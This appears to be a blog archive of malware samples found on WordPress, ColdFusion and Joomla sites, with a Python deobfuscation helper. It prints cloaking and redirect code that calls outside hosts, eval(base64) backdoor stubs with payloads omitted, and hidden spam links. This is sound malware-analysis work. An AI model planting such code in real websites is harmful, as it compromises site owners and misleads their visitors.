Monday, September 25, 2017

Malware Code In WordPress Theme

Found in the single.php file.

<?php
$x0d="pr\x65\147\137\155at\143h";
$x0b = $_SERVER['HTTP_USER_AGENT'];$x0c="\x20\015\012\040\x20\040\040\x20\040\x20\040\074a\040h\162ef\075'\150\164\164\x70\x3a\x2f\x2f\167\x77\x77\056\x61\172wpt\150\145\x6d\145\x73\x2e\143\157\x6d\057\x63\141te\x67\x6fr\171/g\145\156\x65r\141\x6c-\167\160-\164\x68e\155\x65s/'\x3eO\x6e\154\151\x6e\x65\040\106\162\145e W\160\x20\x54\x68\145\x6d\145\x73\x3c\x2f\141\x3e\x20";if ($x0d('*bot*', $x0b)) {echo $x0c;} else {echo ' ';}

Monday, July 11, 2016

Malicious Code on a ColdFusion Website

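Found this piece of malicious code on a ColdFusion-driven website. This is basically black hat SEO: the server-side part serves remotely fetched content to requests whose user agent contains "google" or "yahoo", and the script redirects visitors whose referrer is a Japanese search site.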

<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />
<cfif (Find( "google", REQUEST.UserAgent ) or Find( "yahoo", REQUEST.UserAgent)) >
<cfhttp url="http://www.lv-asn.com/site/168p1.html" />
<cfoutput>#cfhttp.filecontent#</cfoutput>
<cfabort />
</cfif>
<script>
  var s=document.referrer;
  if(s.indexOf("google.co.jp")>0||s.indexOf("docomo.ne.jp")>0||s.indexOf("yahoo.co.jp")>0)
  {
  self.location="http://www.linekopi.com/product/168p1.html";
  }
</script>

Saturday, July 9, 2016

Malicious Backdoor Script

<?php $code=base64_decode("[base64 payload omitted]"); eval("return eval(\"$code\");") ?>

Malicious Code was found in footer.php of a popular WordPress theme

The following malicious code was found in footer.php of a popular WordPress theme.

<?php if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],base64_decode("d3AtYWRtaW4=")) === false) {echo base64_decode(base64_decode(base64_decode("VUVoT2FtTnRiSGRrUTBKNlkyMU5PVWx0YURCa1NFRTJUSGs1YmsxRVFYVlpNamgyVVc1U1IxWnNRbXRKYWpRNFRETk9hbU50Ykhka1JEUk9RMmM5UFEwSw0K")));}
?>
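
Added example (not part of the original posts): a small Python helper for statically unwrapping the two obfuscation styles seen in the single.php and footer.php snippets, PHP escape sequences and nested base64, without executing any of the code. The function names are illustrative, and padding is normalised because obfuscated samples often carry wrong padding.

```python
import base64
import re

# PHP double-quoted escapes: \xHH, octal \NNN, and the simple one-letter forms.
_ESC = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$"])')
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b",
           "f": "\f", "\\": "\\", "$": "$", '"': '"'}
_B64 = re.compile(r"[A-Za-z0-9+/]+")


def decode_php_escapes(literal):
    """Resolve escape sequences in the body of a PHP double-quoted string."""
    def repl(match):
        tok = match.group(1)
        if tok[0] == "x":
            return chr(int(tok[1:], 16))
        if tok[0].isdigit():
            return chr(int(tok, 8) & 0xFF)  # PHP wraps octal values above \377
        return _SIMPLE[tok]
    return _ESC.sub(repl, literal)


def peel_base64(blob, max_layers=8):
    """Decode nested base64 until the result stops looking like base64.

    Returns (text, layers). Nothing is evaluated; the payload is only decoded.
    """
    text, layers = blob, 0
    while layers < max_layers:
        body = "".join(text.split()).rstrip("=")  # drop CR/LF and any padding
        if len(body) < 8 or len(body) % 4 == 1 or not _B64.fullmatch(body):
            break
        raw = base64.b64decode(body + "=" * (-len(body) % 4))
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            break  # binary output: not another text layer
        if not all(c.isprintable() or c in "\r\n\t" for c in decoded):
            break
        text, layers = decoded, layers + 1
    return text, layers


if __name__ == "__main__":
    # Literals copied from the single.php and footer.php snippets above.
    print(decode_php_escapes(r"pr\x65\147\137\155at\143h"))
    for sample in ("UkVRVUVTVF9VUkk=", "d3AtYWRtaW4="):
        print(peel_base64(sample))
```

Passing the long string from the footer.php `echo` to `peel_base64` reports how many base64 layers wrap the injected markup.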

Wednesday, June 1, 2016

Malicious Backdoor Script

<?php $qkdeqwmccgkf="aHR0cDovL2N1c3NvY2FydmUubmV0L2dvb2dsZWJvdC9zZWFyY2gucG9zdC5waHA="; $qdesrzgqddynne=""; $weeuvfcvuckcxk="aHR0cDovL3VuaWNlZi5vcmc=="; $hhtus="s687"; $mgskafxsmyrva="rHL0du8N79Y7brj5zR2n5mJDcXKfxDK7"; ?><?php //GUWPGU// ?><?php
$psdtxfned=strrev("edoced_46esab");$ydazyxb="[base64 payload omitted]";eval($psdtxfned($ydazyxb));
?>

Saturday, December 14, 2013

Malware found on a Joomla driven website

Today, I found this malicious code on a church's website, driven by Joomla.

<div style="display:none"><a href="http://www.sikayetvar.com/firma/detay/fuga-mobilya" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/2137094/fuga-mobilya-zamaninda-teslimat-yapmadi/" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/2108657/fuga-mobilya-gec-teslimat-yapiyor/" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/2080660/fuga-mobilyadan-aldigim-koltuk-ses-cikariyor/" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/2048411/fuga-mobilya-hatali-urun-getirdi/" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/2045973/fuga-mobilya-urunleri-teslim-edemiyor/" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1996547/fuga-mobilya-gecikmeli-teslimat/" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1993556/fuga-mobilya-teslimat-yapmiyor/" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1993798/fuga-mobilya-gec-teslimat/" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1972065/fuga-mobilya-teslimat-yapilmiyor/" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1861963/fuga-mobilya-musteri-hizmeti-cok-kotu/" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1840619/fuga-mobilya-esyalar-teslim-edilmiyor/" title="fuga mobilya">fuga mobilya</a></div>
<div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1566776/fuga-mobilya-kumas-istedigimiz-gibi-cikmadi" title="fuga mobilya">fuga mobilya</a></div>

Friday, May 31, 2013

Backdoor Script

<?php eval(gzinflate(base64_decode("[base64 payload omitted]"))); ?>